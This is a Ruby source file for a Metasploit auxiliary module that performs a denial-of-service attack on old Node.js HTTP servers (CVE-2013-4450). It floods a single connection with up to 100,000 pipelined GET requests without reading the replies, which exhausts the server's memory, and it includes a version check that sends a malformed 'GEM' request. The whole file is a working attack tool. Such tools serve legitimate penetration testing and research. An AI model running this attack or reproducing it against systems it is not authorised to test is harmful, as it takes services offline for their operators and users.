
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/nodejs_pipelining.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
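class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Node.js HTTP Pipelining Denial of Service',
        'Description' => %q{
          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
          released before 0.10.21 and 0.8.26. The attack sends many pipelined
          HTTP requests on a single connection, which causes unbounded memory
          allocation when the client does not read the responses.
        },
        'Author' => [
          'Marek Majkowski', # Vulnerability discovery
          'titanous', # Metasploit module
          'joev' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-4450' ],
          [ 'OSVDB', '98724' ],
          [ 'BID', '63229' ],
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]
        ],
        'DisclosureDate' => '2013-10-18',
        # A successful run takes the target service down; there is no session
        # or artefact left behind beyond the crash itself.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        # Number of pipelined requests written on the single connection.
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
      ]
    )
  end

  # Heuristic version probe (see http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/):
  # Node.js before 0.10.17 still answers a request whose method token is
  # malformed ("GEM"), whereas 0.10.17 and later close the connection without
  # replying. Any reply containing "HTTP" yields Appears, so an unrelated
  # server that answers unknown methods with a 4xx/5xx status line is also
  # reported as Appears; treat the result as an indicator, not as proof of
  # CVE-2013-4450.
  #
  # @return [Msf::Exploit::CheckCode] Appears, Safe, or Unknown when the
  #   target cannot be reached or closes the connection without a response
  def check
    status = Exploit::CheckCode::Safe
    begin
      # connect and the write sit inside begin so the ensure always releases
      # the socket, even when the write itself raises.
      connect
      sock.put(http_request('GEM'))
      response = sock.get_once
      status = Exploit::CheckCode::Appears if response.to_s.match?(/HTTP/)
    rescue EOFError
      # checking against >= 0.10.17 raises EOFError because there is no
      # response to GEM requests
      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')
      status = Exploit::CheckCode::Unknown
    rescue ::Rex::ConnectionError => e
      vprint_error("Unable to connect to #{host}: #{e.message}")
      status = Exploit::CheckCode::Unknown
    ensure
      disconnect
    end
    status
  end

  # Value for the HTTP Host header: RHOST, with ":RPORT" appended only when
  # the port is not the HTTP default of 80. RPORT is compared as an Integer so
  # a string "80" does not produce "host:80", and IPv6 literals are bracketed
  # so the header stays well-formed.
  #
  # @return [String]
  def host
    target = datastore['RHOST'].to_s
    target = "[#{target}]" if Rex::Socket.is_ipv6?(target)
    port = datastore['RPORT'].to_i
    port == 80 ? target : "#{target}:#{port}"
  end

  # Builds one minimal HTTP/1.1 request (request line, Host header, blank
  # line). Used for the check probe with a malformed method token and as the
  # pipelined payload in run.
  #
  # @param method [String] request method token; defaults to GET
  # @return [String] the raw request bytes
  def http_request(method = 'GET')
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
  end

  # Opens one TCP connection and writes RLIMIT copies of the request without
  # reading any response. A connection reset, broken pipe or timeout while
  # writing is reported as the server having fallen over; being unable to
  # connect at all is reported separately. The socket is always released.
  def run
    rlimit = datastore['RLIMIT'].to_i
    if rlimit <= 0
      print_error('RLIMIT must be a positive number of requests')
      return
    end

    payload = http_request
    begin
      print_status('Stressing the target memory...')
      connect
      rlimit.times { sock.put(payload) }
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{host}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
    ensure
      disconnect
    end
  end
end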